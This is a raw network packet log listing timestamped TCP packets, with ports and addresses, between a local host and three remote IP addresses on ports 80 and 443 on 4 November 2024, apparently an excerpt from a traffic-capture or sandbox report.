Nov 4, 2024 17:32:11.163439035 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.163443089 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.163454056 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.163475990 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.163496971 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.163603067 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.163624048 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.163639069 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.163655996 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.163681030 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.200330019 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.200388908 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.200404882 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.200417042 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.200421095 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.200437069 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.200452089 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.200453997 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.200505972 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.200506926 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.200540066 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.200548887 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.200555086 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.200568914 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.200583935 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.200583935 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.200599909 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.200617075 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.200642109 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.200848103 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.200891972 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.200900078 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.200917006 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.200942993 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.200954914 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.200957060 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.200999975 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.201008081 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.201023102 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.201050043 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.201061964 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.230966091 CET	443	49967	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:11.231009960 CET	443	49967	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:11.231065035 CET	443	49967	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:11.231180906 CET	49967	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:11.231916904 CET	49967	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:11.231916904 CET	49967	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:11.231937885 CET	443	49967	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:11.231947899 CET	443	49967	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:11.233072996 CET	443	49965	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:11.233201981 CET	443	49965	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:11.233263016 CET	49965	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:11.240680933 CET	49965	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:11.240691900 CET	443	49965	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:11.241219044 CET	443	49966	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:11.241430998 CET	443	49966	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:11.241528034 CET	49966	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:11.247185946 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.247209072 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.247224092 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.247239113 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.247258902 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.247272015 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.247298956 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.247347116 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.248174906 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.248199940 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.248214960 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.248236895 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.248262882 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.273895025 CET	49966	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:11.273895025 CET	49966	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:11.273917913 CET	443	49966	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:11.273930073 CET	443	49966	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:11.280685902 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.280726910 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.280750036 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.280769110 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.280771971 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.280791044 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.280805111 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.280807972 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.280843973 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.280862093 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.281116962 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.281162024 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.281171083 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.281187057 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.281218052 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.281219006 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.281233072 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.281235933 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.281255960 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.281279087 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.281306028 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.281331062 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.281343937 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.281359911 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.281377077 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.281397104 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.281429052 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.281450987 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.281480074 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.281497955 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.281728029 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.281748056 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.281765938 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.281773090 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.281781912 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.281795025 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.281799078 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.281804085 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.281829119 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.281841040 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.282037020 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.282063961 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.282073021 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.282140017 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.282156944 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.282200098 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.282283068 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.282337904 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.282361984 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.282368898 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.282375097 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.282403946 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.282430887 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.282596111 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.282617092 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.282629967 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.282641888 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.282658100 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.282680035 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.282728910 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.282741070 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.282757044 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.282771111 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.282776117 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.282788038 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.282799959 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.282829046 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.290540934 CET	49970	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:11.290591955 CET	443	49970	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:11.290671110 CET	49970	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:11.300057888 CET	49970	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:11.300081968 CET	443	49970	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:11.306586981 CET	49971	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:11.306615114 CET	443	49971	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:11.306709051 CET	49971	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:11.307399035 CET	49971	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:11.307410955 CET	443	49971	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:11.309391022 CET	49972	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:11.309423923 CET	443	49972	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:11.309494972 CET	49972	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:11.309753895 CET	49972	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:11.309770107 CET	443	49972	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:11.319591999 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.319610119 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.319624901 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.319659948 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.319688082 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.319708109 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.319750071 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.319823027 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.319866896 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.319890022 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.319902897 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.319926977 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.319946051 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.319973946 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.319977999 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.320019960 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.320024967 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.320039034 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.320051908 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.320064068 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.320075989 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.320100069 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.320494890 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.320535898 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.320544958 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.320549011 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.320578098 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.320580006 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.320601940 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.320614100 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.364557028 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.364571095 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.364588022 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.364684105 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.364697933 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.364703894 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.364856958 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.366228104 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.366240025 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.366251945 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.366293907 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.366306067 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.401582003 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.401596069 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.401603937 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.401699066 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.401705980 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.401774883 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.401963949 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.401983023 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.401994944 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.402041912 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.402055979 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.402134895 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.402144909 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.402167082 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.402187109 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.402205944 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.402295113 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.402312040 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.402347088 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.402364969 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.402477026 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.402488947 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.402502060 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.402529955 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.402554035 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.402626991 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.402638912 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.402677059 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.402698040 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.402816057 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.402827024 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.402837992 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.402848959 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.402863979 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.402894974 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.403153896 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.403165102 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.403176069 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.403208971 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.403227091 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.403306961 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.403328896 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.403357029 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.403372049 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.403455019 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.403465033 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.403476000 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.403501034 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.403516054 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.403641939 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.403655052 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.403665066 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.403676987 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.403697014 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.403718948 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.403811932 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.403856039 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.403987885 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.403999090 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.404014111 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.404025078 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.404041052 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.404069901 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.404131889 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.404175997 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.404484034 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.404532909 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.440423965 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.440439939 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.440452099 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.440541029 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.440552950 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.440582037 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.440654039 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.440715075 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.440763950 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.440886974 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.440898895 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.440910101 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.440939903 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.440949917 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.440963030 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.440964937 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.440992117 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.441019058 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.441139936 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.441150904 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.441163063 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.441195965 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.441220045 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.441385984 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.441442013 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.441565037 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.441605091 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.441916943 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.441960096 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.484236002 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.484263897 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.484281063 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.484292984 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.484303951 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.484366894 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.484378099 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.484396935 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.484478951 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.485563040 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.485610008 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.485621929 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.485625029 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.485651970 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.485677004 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.520143032 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.520168066 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.520188093 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.520199060 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.520229101 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.520240068 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.520252943 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.520294905 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.520333052 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.520349979 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.520378113 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.520395994 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.520431042 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.520443916 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.520450115 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.520457029 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.520616055 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.520644903 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.520654917 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.520740032 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.520761013 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.520772934 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.520785093 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.520787001 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.520797968 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:11.520809889 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.520842075 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:11.533256054 CET	49973	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:32:11.533291101 CET	443	49973	40.115.3.253	192.168.2.5
Nov 4, 2024 17:32:11.533361912 CET	49973	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:32:11.534063101 CET	49973	443	192.168.2.5	40.115.3.253
